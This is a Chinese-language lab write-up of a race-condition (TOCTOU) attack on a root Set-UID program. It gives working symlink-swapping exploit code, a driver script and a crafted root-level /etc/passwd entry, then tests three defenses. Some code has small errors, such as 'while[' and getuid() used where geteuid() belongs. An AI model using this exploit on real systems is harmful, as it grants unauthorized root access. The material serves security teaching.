漏洞分析——Race_Condition

Task 1: Exploit the Race Condition Vulnerabilities

首先通过命令sudo sysctl -w kernel.yama.protected_sticky_symlinks=0关闭Ubuntu的保护措施

 被攻击程序代码：

/* vulp.c */
#include <stdio.h>
#include<unistd.h>
#include<string.h>
int main()
{
char * fn = "/tmp/XYZ";
char buffer[60];
FILE *fp;
/* get user input */
scanf("%50s", buffer );
if(!access(fn, W_OK))
{
fp = fopen(fn, "a+");
fwrite("\n", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
}
else printf("No permission \n");
}

攻击程序代码：

#include<unistd.h>
int main()
{
while(1)
{
unlink("/tmp/XYZ");
symlink("/dev/null","/tmp/XYZ");
usleep(1000);
unlink("/tmp/XYZ");
symlink("/etc/passwd","/tmp/XYZ");
usleep(1000);
}
return 0;
}

将两个c文件分别编译为vulp和attack程序

将vulp程序设置为root所有的Set-UID程序

编写bash脚本task1.sh，使该脚本重复运行被攻击程序vulp： 

#!/bin/bash
CHECK_FILE="ls -l /etc/passwd"
old=$($CHECK_FILE)
new=$($CHECK_FILE)
while[ "$old"=="$new" ]
do 
./vulp < passwd_input
new=$($CHECK_FILE)
done
echo "attack success"

赋予task1.sh脚本可读可写可执行权限

使用seed用户创建输入文件paasswd_input文本文件

在窗口输入命令：

echo "crack:"$(openssl passwd -1 -salt a3g1 123456)":0:0:,,,:/root:/bin/bash"

打印出结果：

crack:$1$a3g1$sjnd1nkAwCfjT4/r0sTA20:0:0:,,,:/root:/bin/bash

 将打印出的结果存入passwd_input文本文件中

同时打开两个命令窗体分别运行攻击程序（循环执行）和脚本（循环执行被攻击程序）：

窗口1：

$attack

窗口2：

$task1.sh

 攻击成功：

查看/etc/passwd文件中加入

crack:$1$a3g1$sjnd1nkAwCfjT4/r0sTA20:0:0:,,,:/root:/bin/bash

 使用crack为用户名，123456为密码即可以crack用户身份获得root特权

Task 2: Protection Mechanism A: Repeating

修改被攻击程序的源文件为task2.c文件：

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
void no_perm(void)
{
	printf("no permission.\n");
	exit(EXIT_FAILURE);
}

int main(int argc, char *argv[])
{
	char * fn = "/tmp/XYZ";
	char buffer[60];
	FILE *fp;
	long int i;
	long int rep = 0; // number of repetition
	struct stat inodes[2] = {0};

	rep = 10;
	/* get user input */
	scanf("%50s", buffer );
	for (i = 0; i < rep; ++i) {
		if(!access(fn, W_OK)){
			stat(fn, &inodes[i%2]);
			if (i > 0) {
				if (inodes[0].st_ino != inodes[1].st_ino) {
					no_perm();
				}
			}
		}
		else {
			no_perm();
		}
	}
	fp = fopen(fn, "a+");
	fwrite("\n", sizeof(char), 1, fp);
	fwrite(buffer, sizeof(char), strlen(buffer), fp);
	fclose(fp);
}

通过创建多次竞争，使得攻击者成功的可能性降低

攻击程序不变

脚本bash中做细微修改（执行程序名改为task2）

#!/bin/bash
CHECK_FILE="ls -l /etc/passwd"
old=$($CHECK_FILE)
new=$($CHECK_FILE)
while [ "$old" == "$new" ]
do 
./task2 < passwd_input
new=$($CHECK_FILE)
done
echo "attack success"

同时打开两个命令窗体分别运行攻击程序（循环执行）和脚本（循环执行被攻击程序）：

窗口1：

$attack

窗口2：

$task1.sh

 

此次攻击相对于task1的攻击而言，耗时稍长，但在计算机的运算下，也只需几秒钟即可攻击成功。

Task 3: Protection Mechanism B: Principle of Least Privilege  

 修改被攻击程序的源文件为task3.c

#include <stdio.h>
#include<unistd.h>
#include<string.h>
int main()
{
char * fn = "/tmp/XYZ";
char buffer[60];
FILE *fp;
uid_t real_uid=getuid();
uid_t eff_uid=getuid();

seteuid(real_uid);
/* get user input */
scanf("%50s", buffer );
if(!access(fn, W_OK)){
fp = fopen(fn, "a+");
fwrite("\n", sizeof(char), 1, fp);
fwrite(buffer, sizeof(char), strlen(buffer), fp);
fclose(fp);
}
else printf("No permission \n");
seteuid(eff_uid);
}

使用seteuid()把有效用户ID设置为真实用户ID，暂时关闭了root权限。

攻击程序不变

脚本bash中做细微修改（执行程序名改为task3）

#!/bin/bash
CHECK_FILE="ls -l /etc/passwd"
old=$($CHECK_FILE)
new=$($CHECK_FILE)
while [ "$old" == "$new" ]
do 
./task3 < passwd_input
new=$($CHECK_FILE)
done
echo "attack success"

同时打开两个命令窗体分别运行攻击程序（循环执行）和脚本（循环执行被攻击程序）：

窗口1：

$attack

窗口2：

$task3.sh

运行结果：

seteuid()暂停了程序的root权限，使得攻击无法成功。

Task 4: Protection Mechanism C: Ubuntu’s Built-in Scheme

将被攻击程序的源文件改回task1中的vulp.c，重新编译并设置其为root所有的Set-UID程序。

重新打开保护机制，输入命令：

$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=1 

打开两个窗口

窗口1：

$attack

窗口2：

$task4.sh

运行结果：

该保护机制限制了程序是否可以使用一个全局可写目录中的符号链接，导致无法使用竞态条件漏洞攻击程序，致使攻击失败。

---

仅供学习交流使用，转载请与作者说明